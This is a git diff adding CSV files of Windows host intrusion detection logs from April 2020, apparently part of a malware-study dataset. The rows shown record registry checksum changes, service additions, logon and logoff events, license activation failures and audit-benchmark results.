+"Apr 6, 2020 @ 08:42:20.697",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed.
+Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66'
+New md5sum is : 'ab713c4b4d0f5b552b126609fb3b75d4'
+Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8'
+New sha1sum is : 'e32118e6d00839882de6534855328ee6ea626937'
+"
+"Apr 6, 2020 @ 08:42:12.713",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed.
+Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156'
+New md5sum is : '7d860345e2361b6fe3f0b507144407de'
+Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6'
+New sha1sum is : '2bb6b3a39b4dd7c401a2d64d3b709e3461441900'
+"
+"Apr 6, 2020 @ 08:42:11.214",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:11.198",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:11.104",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:11.088",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:10.832",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:10.810",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:10.209",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:10.166",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:10.011",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:09.979",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:09.807",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed.
+Old md5sum was: '67c10bdce559c177fe0d89a2be194410'
+New md5sum is : '5b06acdc8ed6732e0719fab302999091'
+Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376'
+New sha1sum is : 'a4fa3b6743a44afa0d4ad52e2b3d1fc14c834bde'
+"
+"Apr 6, 2020 @ 08:42:08.480",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:08.463",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:08.275",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:08.259",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:08.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:08.166",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:05.962",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:05.915",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\4' was added.
+"
+"Apr 6, 2020 @ 08:42:05.900",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\3' was added.
+"
+"Apr 6, 2020 @ 08:42:05.884",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\2' was added.
+"
+"Apr 6, 2020 @ 08:42:05.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\1' was added.
+"
+"Apr 6, 2020 @ 08:42:05.853",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\0' was added.
+"
+"Apr 6, 2020 @ 08:42:05.824",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:04.948",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:04.931",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:04.649",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed.
+Old md5sum was: '9f6b145dfd560fe21c8d05748910373f'
+New md5sum is : '06af42748390daff7b5be7ab37ce006b'
+Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11'
+New sha1sum is : '95537e6767865122fd6069ff8cba7c0c15128cfe'
+"
+"Apr 6, 2020 @ 08:42:04.634",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '0ad0f48020a8ebbc63203c341912f537'
+New md5sum is : '43a77ab77644af5b48059f1a434b4f64'
+Old sha1sum was: '85a0461adc8c3056a8b46539db16a9bcbfcccb42'
+New sha1sum is : '3bb88ce280ecae452b20b6562ce7691109a77407'
+"
+"Apr 6, 2020 @ 08:42:04.588",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed.
+Old md5sum was: '61861e9234c9745ccfd26c43b3589c1e'
+New md5sum is : '8e594f3f92f6bf1d9d7c6ed70cc63483'
+Old sha1sum was: '047a670f4ac17480436455d7920b1c013f94d076'
+New sha1sum is : 'db4e5315a98cea97251d1bebbbaed6f0edd22768'
+"
+"Apr 6, 2020 @ 08:42:02.103",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2af29' was added.
+"
+"Apr 6, 2020 @ 08:42:02.072",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2af29\Security' was added.
+"
+"Apr 6, 2020 @ 08:42:01.015",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed.
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e'
+New md5sum is : '497a8c7081c737f07c267a30b1538ff9'
+Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e'
+"
+"Apr 6, 2020 @ 08:41:47.650",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed.
+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e'
+New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da'
+Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06'
+"
+"Apr 6, 2020 @ 08:41:45.556",3,"Windows Logon Success",
+"Apr 6, 2020 @ 08:41:15.992",3,"Software Protection service scheduled successfully",
+"Apr 6, 2020 @ 08:41:05.478",3,"Windows User Logoff",
+"Apr 6, 2020 @ 08:41:05.462",3,"Windows User Logoff",
+"Apr 6, 2020 @ 08:41:05.430",3,"Windows Workstation Logon Success",
+"Apr 6, 2020 @ 08:41:05.399",3,"Windows Workstation Logon Success",
+"Apr 6, 2020 @ 08:40:49.399",3,"Windows Logon Success",
+"Apr 6, 2020 @ 08:40:45.898",5,"License Activation (slui.exe) failed",
+"Apr 6, 2020 @ 08:40:40.398",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",
+"Apr 6, 2020 @ 08:40:37.383",3,"The Windows Search Service started",
+"Apr 6, 2020 @ 08:40:36.151",3,"The database engine attached a database",
+"Apr 6, 2020 @ 08:40:36.016",3,"The database engine is starting a new instance",
+"Apr 6, 2020 @ 08:40:35.896",3,"Windows Logon Success",
+"Apr 6, 2020 @ 08:40:32.790",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",
+"Apr 6, 2020 @ 08:40:29.161",3,"Windows Workstation Logon Success",
+"Apr 6, 2020 @ 08:40:29.136",3,"Windows Workstation Logon Success",
+"Apr 6, 2020 @ 08:40:28.477",5,"SessionEnv was unavailable to handle a notification event",
+"Apr 6, 2020 @ 08:40:27.898",7,"SessionEnv was unavailable to handle a critical notification event",
+"Apr 6, 2020 @ 08:40:26.618",3,"Windows Logon Success",
+"Apr 6, 2020 @ 08:40:24.624",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'."
+"Apr 6, 2020 @ 08:39:51.536",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed.
+Old md5sum was: '497a8c7081c737f07c267a30b1538ff9'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+"
+"Apr 6, 2020 @ 08:39:51.522",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed.
+Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+"
+"Apr 6, 2020 @ 08:39:47.944",5,"SessionEnv was unavailable to handle a notification event",
+"Apr 6, 2020 @ 08:39:47.868",5,"WSearch was unavailable to handle a notification event",
+"Apr 6, 2020 @ 08:37:47.391",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed.
+Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53'
+New md5sum is : 'c0405481b74cf6174a880af1ccc1d4b0'
+Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa'
+New sha1sum is : 'b7d4bb4d3cde4fa21584725503c78a8e4d7d6788'
+"
+"Apr 6, 2020 @ 08:37:47.332",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed.
+Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37'
+New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2'
+Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51'
+New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c'
+"
+"Apr 6, 2020 @ 08:37:36.031",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed.
+Old md5sum was: 'f5837d19200fde256d1b45c83baa0a62'
+New md5sum is : '2d7700c4aad93b7ea9895df444a9e372'
+Old sha1sum was: '02b87378b62f94cbda8368aad963101b79b8bedb'
+New sha1sum is : 'c7564ff6dc5d69537cd3bce619e28a3f1f103254'
+"
+"Apr 6, 2020 @ 08:37:35.046",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed.
+Old md5sum was: '5950f3809329b90b7cce78b6656eb8fc'
+New md5sum is : 'f8834fc0455ef259559a8ced142930a5'
+Old sha1sum was: 'a47f7cd0ccdd5c421ff3869cb4f5405670613f35'
+New sha1sum is : '058f6d910ba5475de9cdaf669663685b92c3f0ca'
+"
+"Apr 6, 2020 @ 08:37:34.967",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed.
+Old md5sum was: '0a11a072fc5a95522aa8ca6087115073'
+New md5sum is : '728627011eedd28411cf4e1f2a30d1ca'
+Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f'
+New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2'
+"
+"Apr 6, 2020 @ 08:36:51.874",3,"Windows Logon Success",
+"Apr 6, 2020 @ 08:36:44.024",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: 'c07851f8f2e30eb65757347b948170ba'
+New md5sum is : '0ad0f48020a8ebbc63203c341912f537'
+Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60'
+New sha1sum is : '85a0461adc8c3056a8b46539db16a9bcbfcccb42'
+"
+"Apr 6, 2020 @ 08:36:44.013",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed.
+Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3'
+New md5sum is : '61861e9234c9745ccfd26c43b3589c1e'
+Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca'
+New sha1sum is : '047a670f4ac17480436455d7920b1c013f94d076'
+"
+"Apr 6, 2020 @ 08:35:31.302",3,"Software Protection service scheduled successfully",
+"Apr 6, 2020 @ 08:35:08.882",3,"Windows Logon Success",
+"Apr 6, 2020 @ 08:34:22.502",8,"Windows Audit Policy changed",
+"Apr 6, 2020 @ 08:34:22.486",8,"Windows Audit Policy changed",
+"Apr 6, 2020 @ 08:34:02.345",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed.
+Old md5sum was: '7a736e3adebf5a509150741055fa891a'
+New md5sum is : 'f65ebed619edcfc8fafe21f958215b53'
+Old sha1sum was: '1190d3e310a517ef8601b9cb3e3298006d42b480'
+New sha1sum is : '493297f96d762981a98fbe5f8c5b5782c30b65aa'
+"
+"Apr 6, 2020 @ 08:34:02.314",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed.
+Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2'
+New md5sum is : '619d435b1dac461a9b0cfd3b48ee8f37'
+Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c'
+New sha1sum is : '95d0826303f42e23fada9a211bd9ea71de2d5c51'
+"
diff --git a/data/MW_19_HIDS_2.csv b/data/MW_19_HIDS_2.csv
new file mode 100644
index 0000000..59fe206
--- /dev/null
+++ b/data/MW_19_HIDS_2.csv
@@ -0,0 +1,1035 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 26, 2020 @ 10:46:05.360",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x250 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. 
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:53.069",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB5A1C + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:45:52.862",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB5A4B + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:45:52.829",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB5A4B + Linked Logon ID: 0xB5A1C + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3e4 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:52.820",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB5A1C + Linked Logon ID: 0xB5A4B + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3e4 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:49.815",5,"Logon Failure - Unknown user or bad password",,"""An account failed to log on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Type: 2 + +Account For Which Logon Failed: + Security ID: S-1-0-0 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + +Failure Information: + Failure Reason: Unknown user name or bad password. + Status: 0xC000006D + Sub Status: 0xC000006A + +Process Information: + Caller Process ID: 0x3e4 + Caller Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon request fails. It is generated on the computer where access was attempted. + +The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The Logon Type field indicates the kind of logon that was requested. 
The most common types are 2 (interactive) and 3 (network). + +The Process Information fields indicate which account and process on the system requested the logon. + +The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The authentication information fields provide detailed information about this specific logon request. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:44.322",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x250 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. 
This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:38.765",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable""" +"Apr 26, 2020 @ 10:45:38.655",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 26, 2020 @ 10:45:38.240",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 26, 2020 @ 10:45:35.080",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 26, 2020 @ 10:45:34.346",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 26, 2020 @ 10:45:34.314",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x250 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
